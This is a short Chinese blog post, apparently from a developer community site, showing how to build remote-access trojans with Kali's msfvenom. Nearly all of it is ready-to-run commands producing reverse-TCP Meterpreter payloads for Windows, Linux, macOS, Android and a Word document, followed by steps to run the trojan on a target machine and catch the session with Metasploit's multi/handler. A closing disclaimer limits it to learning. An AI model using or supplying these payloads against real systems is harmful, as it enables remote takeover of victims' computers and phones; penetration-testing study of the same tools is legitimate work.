前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >使用kali msfvenom编写远控木马“实验”

使用kali msfvenom编写远控木马“实验”

原创
作者头像
用户10508869
修改2023-04-23 09:45:42
1.7K0
修改2023-04-23 09:45:42
举报
文章被收录于专栏:信息安全必修课

打开终端并输入以下命令:msfvenom -p [payload] LHOST=[IP地址] LPORT=[端口号] -f [格式] -o [文件名]

将[payload]替换为你想要使用的载荷类型,例如linux/x86/meterpreter/reverse_tcp。

将[IP地址]替换为你的IP地址。

将[端口号]替换为你想要使用的端口号。

将[格式]替换为你想要使用的文件格式。

将[文件名]替换为你想要使用的文件名。

例如,如果你想生成一个反向连接的Linux,可以使用以下命令:

代码语言:javascript
复制
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f elf -o linux.elf

因为系统的不同,命令存在一定差异。

window系统

代码语言:javascript
复制
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o windows.exe

苹果系统

代码语言:javascript
复制
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f macho -o mac.macho

安卓系统

代码语言:javascript
复制
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 R > /root/安卓.apk

你甚至可以使用以下命令来生成一个反向链接的docx文档:

代码语言:javascript
复制
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f docx > office.docx

最后我们来测试一下,通过在kali上运行

代码语言:javascript
复制
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1LPORT=4444-f exe -o windows.exe

得到生成的名为windows.exe的木马程序。

把生成的windows.exe木马文件拖放到windows靶机上,运行。

我们在kali运行mafconfig,后运行

代码语言:javascript
复制
use exploit/multi/handler

设置好端口和ip(ip和端口都是kali的)。

代码语言:javascript
复制
set lport 设置端口,命令中开放的端口
代码语言:javascript
复制
set lhost 设置ip,填写kali的ip
代码语言:javascript
复制
set payload 设置荷载方式

荷载方式就是

代码语言:javascript
复制
msfvenom -p [payload] LHOST=[IP地址] LPORT=[端口号] -f [格式] -o [文件名]

中填写在[payload]位置的命令。

最后在输入run就可以了。

当出现meterpreter > 时候以为成功了
当出现meterpreter > 时候以为成功了

本篇文章就到此结束了,注,本文章只能用于学习,生成的木马文件不得传播,传播后造成损失的将会按照法律依法处理。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档